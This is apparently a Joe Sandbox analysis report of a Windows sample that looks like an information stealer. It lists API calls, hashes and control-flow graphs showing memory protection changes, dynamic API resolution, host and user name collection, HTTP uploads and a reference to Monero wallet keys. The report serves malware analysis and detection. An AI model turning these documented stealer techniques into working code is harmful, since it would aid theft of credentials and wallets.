                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: b0af6d8fd399dc5e388481ccdc14e734d4bc26e80456a6c38ff9fb0773cfe411
                                • Instruction ID: 908a9597e08e3d89ea49ce3b862da8ebf169da991e1a77c9c439ad12a93940be
                                • Opcode Fuzzy Hash: b0af6d8fd399dc5e388481ccdc14e734d4bc26e80456a6c38ff9fb0773cfe411
                                • Instruction Fuzzy Hash: D4A10BB5710340EFD366EFA8E998A5637F9F78C301F14855AA68A8324CD73F9941CB60
                                Function 00DC45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 dc45c0-dc4695 RtlAllocateHeap 781 dc46a0-dc46a6 764->781 782 dc46ac-dc474a 781->782 783 dc474f-dc47a9 VirtualProtect 781->783 782->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00DC479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: baaa0ed63d1495ba6c22674f8765b1a5f3b13de7b18ccc2181917c22f4a4960e
                                • Instruction ID: 0ae8bade20eb276808c9a17b2827dc0acaff3f49b7843672633f2ebd88964fb8
                                • Opcode Fuzzy Hash: baaa0ed63d1495ba6c22674f8765b1a5f3b13de7b18ccc2181917c22f4a4960e
                                • Instruction Fuzzy Hash: 984116207DB6946FCE24BBA5AC4EEAD7756FF4AF48F605848A80052286CBB06524C536
                                Function 00DC4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 dc4880-dc4942 call dda7a0 call dc47b0 call dda740 * 5 InternetOpenA StrCmpCA 816 dc494b-dc494f 801->816 817 dc4944 801->817 818 dc4ecb-dc4ef3 InternetCloseHandle call ddaad0 call dc9ac0 816->818 819 dc4955-dc4acd call dd8b60 call dda920 call dda8a0 call dda800 * 2 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda920 call dda8a0 call dda800 * 2 InternetConnectA 816->819 817->816 829 dc4ef5-dc4f2d call dda820 call dda9b0 call dda8a0 call dda800 818->829 830 dc4f32-dc4fa2 call dd8990 * 2 call dda7a0 call dda800 * 8 818->830 819->818 905 dc4ad3-dc4ad7 819->905 829->830 906 dc4ad9-dc4ae3 905->906 907 dc4ae5 905->907 908 dc4aef-dc4b22 HttpOpenRequestA 906->908 907->908 909 dc4ebe-dc4ec5 InternetCloseHandle 908->909 910 dc4b28-dc4e28 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda740 call dda920 * 2 call dda8a0 call dda800 * 2 call ddaad0 lstrlen call ddaad0 * 2 lstrlen call ddaad0 HttpSendRequestA 908->910 909->818 1021 dc4e32-dc4e5c InternetReadFile 910->1021 1022 dc4e5e-dc4e65 1021->1022 1023 dc4e67-dc4eb9 InternetCloseHandle call dda800 1021->1023 1022->1023 1024 dc4e69-dc4ea7 call dda9b0 call dda8a0 call dda800 1022->1024 1023->909 1024->1021
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                  • Part of subcall function 00DC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DC4915
                                • StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00DE0DDB,00000000,?,?,00000000,?,",00000000,?,0162EB08), ref: 00DC4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DC4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DC4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DC4E49
                                • InternetCloseHandle.WININET(00000000), ref: 00DC4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00DC4EC5
                                • HttpOpenRequestA.WININET(00000000,0162E9D8,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC4B15
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00DC4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: 6f28e7f2eb6eebd547abfee45271e1bf32208405f78eadd9be72ddbf6e5e364c
                                • Instruction ID: c051403d90109bf70ee4f28ffda8599f9c9c3867ab44001fb161ead1cd363a8b
                                • Opcode Fuzzy Hash: 6f28e7f2eb6eebd547abfee45271e1bf32208405f78eadd9be72ddbf6e5e364c
                                • Instruction Fuzzy Hash: 7512EA71910258AADB25EB94DCA2FEEB378EF14300F50819AB50663191EF702F49DF76
                                Function 00DD78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD7917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00DD792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: fd69d95d18cbac0d76dc3ee4430b2356a71b90f597e93d99199fdc2b77fcf74a
                                • Instruction ID: 5a0e59e63811d1e623d0748ea0960e463f6ac9199b47ae3ef78b52c40d2793ff
                                • Opcode Fuzzy Hash: fd69d95d18cbac0d76dc3ee4430b2356a71b90f597e93d99199fdc2b77fcf74a
                                • Instruction Fuzzy Hash: 920186B1A44308EFC710DF95D945BAEBBB8F704B21F10425AF585E3380D37559048BB1
                                Function 00DD7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DC11B7), ref: 00DD7880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD7887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DD789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 561c93f3623fd9a665a0837e1a327c28c6057c3bef412e2f386188e3e33ea492
                                • Instruction ID: 302a980f1e1ef6d89007b8175eacfa870875b3cc95e9c98da46f7e337943c90a
                                • Opcode Fuzzy Hash: 561c93f3623fd9a665a0837e1a327c28c6057c3bef412e2f386188e3e33ea492
                                • Instruction Fuzzy Hash: 07F04FB1E44208EFCB10DF98DD49BAEBBB8FB04721F10025AFA45A3780C77955048BA1
                                Function 00DC1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: a102d64594b41e17b2d21f8b321044a019b94ebb2d31f2e816f92f72147e748d
                                • Instruction ID: bcf9d190b7ebeb47fcf557b4758f46cf704878ee7d0835f9e331f4c5196e2ea7
                                • Opcode Fuzzy Hash: a102d64594b41e17b2d21f8b321044a019b94ebb2d31f2e816f92f72147e748d
                                • Instruction Fuzzy Hash: 1AD05E74A0430CDBCB10DFE0D849ADDBBB8FB08311F000658D90A63340EA355481CBA5
                                Function 00DD9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 dd9c10-dd9c1a 634 dda036-dda0ca LoadLibraryA * 8 633->634 635 dd9c20-dda031 GetProcAddress * 43 633->635 636 dda0cc-dda141 GetProcAddress * 5 634->636 637 dda146-dda14d 634->637 635->634 636->637 638 dda216-dda21d 637->638 639 dda153-dda211 GetProcAddress * 8 637->639 640 dda21f-dda293 GetProcAddress * 5 638->640 641 dda298-dda29f 638->641 639->638 640->641 642 dda2a5-dda332 GetProcAddress * 6 641->642 643 dda337-dda33e 641->643 642->643 644 dda41f-dda426 643->644 645 dda344-dda41a GetProcAddress * 9 643->645 646 dda428-dda49d GetProcAddress * 5 644->646 647 dda4a2-dda4a9 644->647 645->644 646->647 648 dda4dc-dda4e3 647->648 649 dda4ab-dda4d7 GetProcAddress * 2 647->649 650 dda515-dda51c 648->650 651 dda4e5-dda510 GetProcAddress * 2 648->651 649->648 652 dda612-dda619 650->652 653 dda522-dda60d GetProcAddress * 10 650->653 651->650 654 dda67d-dda684 652->654 655 dda61b-dda678 GetProcAddress * 4 652->655 653->652 656 dda69e-dda6a5 654->656 657 dda686-dda699 GetProcAddress 654->657 655->654 658 dda708-dda709 656->658 659 dda6a7-dda703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01615A70), ref: 00DD9C2D
                                • GetProcAddress.KERNEL32(74DD0000,01615790), ref: 00DD9C45
                                • GetProcAddress.KERNEL32(74DD0000,016296D0), ref: 00DD9C5E
                                • GetProcAddress.KERNEL32(74DD0000,01629628), ref: 00DD9C76
                                • GetProcAddress.KERNEL32(74DD0000,01629640), ref: 00DD9C8E
